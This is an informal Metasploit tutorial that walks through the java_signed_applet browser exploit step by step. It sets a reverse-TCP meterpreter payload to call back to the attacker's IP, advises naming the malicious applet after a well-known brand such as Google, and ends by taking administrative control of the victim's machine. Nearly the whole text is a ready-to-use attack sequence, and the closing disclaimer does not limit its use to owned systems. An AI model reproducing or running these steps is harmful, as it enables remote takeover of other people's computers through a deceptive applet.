Metasploit

HOWTO METASPLOIT

We open a shell and type:

sudo msfconsole

This program uses exploits for cracking another computer, we will use a virtual machine or in my case another computer of mine.

We will use this exploit:

use exploit/multi/browser/java_signed_applet

This exploit uses java, that is present in mostly of the web apps.

We have to name the plugin:

set APPLETNAME google

You can name the applet as you wish, but try to put something well-known

Now you have to create the server, the server is our IP. The client will conect to that direction. If you don't know your Ip, open a shell and type:

sudo ifconfig

I'm conected to the interface wlan0, so my IP is 192.168.1.41

We come back to the metasploit shell and type:

set SRVHOST 192.168.1.41

Now the port, the port is usually 80:

set SRVPORT 80

The route:

set URIPATH /

And now we run the payload:

set payload windows/meterpreter/reverse_tcp

Now we have to put the local host, that's our IP too:

set LHOST 192.168.1.41

Now run the exploit:

exploit

And that's all, in the virtual machine type the IP in your browser.

Then java will appear:

Then in our computer, and in the metasploit shell will appear

Meterpreter opened in session 1 

Or something like that, so we have to type:

sessions -i 1

The number is the id of the session, it can be 1, 2 or another number. Now you are de admin in that computer, you can use the orders of windows:

shutdown, reboot, regshot....

There are a lot of orders, so you have to try all of them.

I have learned all with google and watching videos. I'm not responsible of what you do, with this tutorial.